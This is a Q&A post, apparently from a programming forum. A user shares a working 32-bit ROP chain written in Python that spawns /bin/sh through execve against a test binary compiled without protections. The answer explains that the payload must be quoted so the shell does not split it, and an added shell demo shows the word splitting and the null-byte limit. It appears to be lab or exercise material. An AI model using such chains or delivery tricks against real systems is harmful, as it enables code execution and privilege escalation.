I have created a ROP attack chain which I know works, since I have tested it with another program without the problem code.

My problem is that whenever I run my ROP chain as an input argument to my target binary, it can't get past this part:

if (argc != 2) {
    fprintf(stderr, "Error: need a command-line argument\n");
    return 1;
}

I am running it like: ./target $(python inject.py)

Below is my attack chain:

#!/usr/bin/env python2

from struct import pack

p = 'A'*112

p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080c2316) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0808e93d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef064) # @ .data + 4
p += pack('<I', 0x080c2316) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0808e93d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x08051710) # xor eax, eax ; ret
p += pack('<I', 0x0808e93d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ec) # pop ebx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080e3cc6) # pop ecx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x080572fa) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x08051710) # xor eax, eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x0809a506) # inc eax ; ret
p += pack('<I', 0x080494b9) # int 0x80
print p

When I remove the check for arguments above, it works, giving me root access to a terminal.

These are the headers I compiled the program with: -g -m32 -static -U_FORTIFY_SOURCE -fno-stack-protector

The target has DEP on.

Daniel

1 Answer

Your argc is not 2 when it is called with ./target $(python inject.py). The command substitution $() executes, returns, then sends its value, splitting on each space, which causes the number of arguments to ./target to be greater than 2.

To prevent the shell from splitting on each space in the command substitution, put quotes around the command substitution to prevent it from splitting the result and instead take it as a single parameter.

Change:

./target $(python inject.py)

to

./target "$(python inject.py)"

Check out the following for more information:

0xcaff
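The word splitting the answer describes, as an added example that is not part of the original question or answer: the payload generator and the function names are made up here, and the stand-in mirrors the C argc check by counting $# + 1.

```shell
#!/bin/sh
# Added example, not from the question or the answer above: shows how an
# unquoted $(...) is split on IFS (space, tab, newline) before argv is built,
# and how double quotes keep the whole result as one argument.

# Disable pathname expansion so the demo depends on IFS splitting only
# (an unquoted result containing * or ? would otherwise be globbed too).
set -f

# Stand-in for the target's argc check: a C program sees argc = $# + 1,
# so the check `argc != 2` passes only when exactly one argument arrives.
argc_of() {
    echo $(( $# + 1 ))
}

# Constructed payload generator (hypothetical): emits filler bytes that happen
# to include a space (0x20) and a tab (0x09), as any packed chain might by chance.
gen_payload() {
    printf 'AAAA\040BBBB\011CCCC'
}

# ./target $(python inject.py): the shell splits the output into three words.
unquoted_argc() {
    argc_of $(gen_payload)
}

# ./target "$(python inject.py)": the whole output is a single argv entry.
quoted_argc() {
    argc_of "$(gen_payload)"
}

# Side-by-side report a practitioner can run before launching the real target.
report() {
    echo "unquoted argc: $(unquoted_argc)   quoted argc: $(quoted_argc)"
}
```

Quoting does not help with a 0x00 byte: argv strings are NUL-terminated, so any chain passed on the command line must contain no null bytes at all.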